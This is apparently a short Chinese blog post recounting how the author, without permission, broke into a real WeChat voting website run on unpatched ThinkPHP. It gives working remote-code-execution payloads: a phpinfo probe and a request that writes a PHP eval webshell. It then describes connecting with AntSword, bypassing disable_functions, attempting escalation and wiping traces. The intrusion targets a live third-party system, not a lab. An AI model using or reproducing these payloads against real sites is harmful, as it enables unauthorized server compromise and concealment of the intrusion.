记一次偶然getshell

今天一个同学让我给他微信扫码投票，因为最近快期末了没什么课，无聊就想着试一试有没有逻辑漏洞能够刷投票数的，然后开始

 首先扫码抓包，个人喜欢拿手机直接走电脑代理抓包

 抓到url（这里发现是一个四级域名）

因为测试点赞逻辑漏洞失败了所以这里不写失败过程了

接着进行信息收集

个人喜欢先fofa，直接搜索顶级域名，发现顶级域名和该点赞url域名处于不同ip

查询备案，这个顶级域名属于一个科技公司，懒得打他了，专心打这个点赞的

浏览器点点后发现是thinkphp

构造报错，查看版本

嗯，运气很好，谷歌一下这个版本的nday，我记得是有的

先试这个：

poc: /index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
 嗯很好

看来是没打补丁

直接传shell

poc: /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20%40eval%28%24_POST%5B2233%5D%29%3B%3F%3E

蚁剑连接

尝试执行执行命令后失败

意识到应该是disable_function了

尝试使用蚁剑自带插件绕过

 

再次执行

成功

尝试提取，失败（这里不记录艰辛历程了）

痕迹清理，到此结束。